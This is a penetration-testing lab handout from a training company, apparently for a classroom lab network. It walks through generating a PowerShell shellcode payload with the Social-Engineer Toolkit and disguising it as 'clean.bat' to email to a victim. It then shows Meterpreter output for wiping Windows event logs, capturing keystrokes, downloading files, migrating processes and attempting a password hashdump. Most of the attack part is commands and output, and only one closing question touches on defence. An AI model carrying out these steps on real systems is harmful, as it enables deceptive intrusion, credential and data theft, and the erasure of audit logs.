NEXUS EDUCATION SERVICES
📍 Suite 1611 16th Floor AIC Burgundy Empire Tower ADB Ave corner Garnet Road Ortigas Center Pasig
☎ Smart: 09998165357 ☎ PLDT: 788-1419 📧 kdoz@live.com 🌐 www.nexusph.net
This is an intellectual property of Nexus Education services. Reproduction and distribution without consent will be sued to the court of Law.
The law: Republic Act No. 8293 [An Act Prescribing the Intellectual Property Code and Establishing the Intellectual Property Office, Providing for Its Powers and Functions, and for Other
Purposes] otherwise known as the Intellectual Property Code of the Philippines
Social Engineering Penetration Testing using PowerShell Attack
As a responsible ethical hacker, security engineer or penetration tester you should be familiar with the tools to
perform a penetration testing
HANDS-ON LAB:
Lab Objectives:
Lab Duration:
▪ Time: 45 minutes
Lab Environment
▪ You need internet connection
Lab Tasks
Tools
Step-by-Steps Instructions
Open a new Terminal and run SET
setoolkit
1) Social-Engineering Attacks
9) Powershell Attack Vectors
1) Powershell Alphanumeric Shellcode Injector
enter the ip ok Kali 192.168.145.130
accept 443 press enter
type yes
! open a new term and look for the powershell injection file
ls /root/.set/reports/powershell and you will see a file call x86_powershell_injection.txt
cp /root/.set/reports/powershell/ Desktop
rename x86_powershell_injection.txt to clean.bat and send it to the victim via email
1 I have copied the file already to windows server 2012 desktop, just run clean.bat
Go back to the Kali with meterpreter open and type sessions -i 1
msf5 exploit(multi/handler) > sessions -i 1
1
�NEXUS EDUCATION SERVICES
📍 Suite 1611 16th Floor AIC Burgundy Empire Tower ADB Ave corner Garnet Road Ortigas Center Pasig
☎ Smart: 09998165357 ☎ PLDT: 788-1419 📧 kdoz@live.com 🌐 www.nexusph.net
This is an intellectual property of Nexus Education services. Reproduction and distribution without consent will be sued to the court of Law.
The law: Republic Act No. 8293 [An Act Prescribing the Intellectual Property Code and Establishing the Intellectual Property Office, Providing for Its Powers and Functions, and for Other
Purposes] otherwise known as the Intellectual Property Code of the Philippines
[*] Starting interaction with 1...
Type sysinfo
meterpreter > sysinfo
Computer : NEXUSSERVER
OS : Windows 2012 R2 (Build 9600).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
type ? to see all commands available
Go to windows and type eventvwr check to see that the windows logs has thousands of event log which is about to
disappear
go back to Kali and type clearev
meterpreter > clearev
[*] Wiping 1612 records from Application...
[*] Wiping 3201 records from System...
[*] Wiping 9106 records from Security...
execute -f calc
! Start capturing keystrokes
keyscan_start
! Dump the keystroke buffer and you will see all the keystroke from server 2012
keyscan_dump
! Stop keylogger
keyscan_stop
! go to Windows dir and you will see that you have gained access to windows servers drive c:
cd c:\windows
pwd
ls
! Download a file from victims PC to your Kali
pwd
cd C:\Users\Administrator\pictures
download cat.jpg
meterpreter > shell
Process 452 created.
2
�NEXUS EDUCATION SERVICES
📍 Suite 1611 16th Floor AIC Burgundy Empire Tower ADB Ave corner Garnet Road Ortigas Center Pasig
☎ Smart: 09998165357 ☎ PLDT: 788-1419 📧 kdoz@live.com 🌐 www.nexusph.net
This is an intellectual property of Nexus Education services. Reproduction and distribution without consent will be sued to the court of Law.
The law: Republic Act No. 8293 [An Act Prescribing the Intellectual Property Code and Establishing the Intellectual Property Office, Providing for Its Powers and Functions, and for Other
Purposes] otherwise known as the Intellectual Property Code of the Philippines
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
meterpreter > execute -f cmd.exe -i -H
Process 3708 created.
Channel 1 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\Administrator\Downloads>ps
meterpreter > run post/windows/manage/migrate
[*] Running module against NEXUSSERVER
[*] Current server process: powershell.exe (2844)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 4068
[+] Successfully migrated to process 4068
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY f93580f87e94025a7a009eb1886569f1...
[-] Meterpreter Exception: Rex::Post::Meterpreter::RequestError stdapi_registry_open_key: Operation failed:
Access is denied.
[-] This script requires the use of a SYSTEM user context (hint: migrate into service process)
Result of penetration testing: by now you should know how attacker send keylogger and gather the username
and password to be used for remote connection to gain root access
Question: As a Nexus Ethical Hacker what should you do to protect your company from Powershell Attack
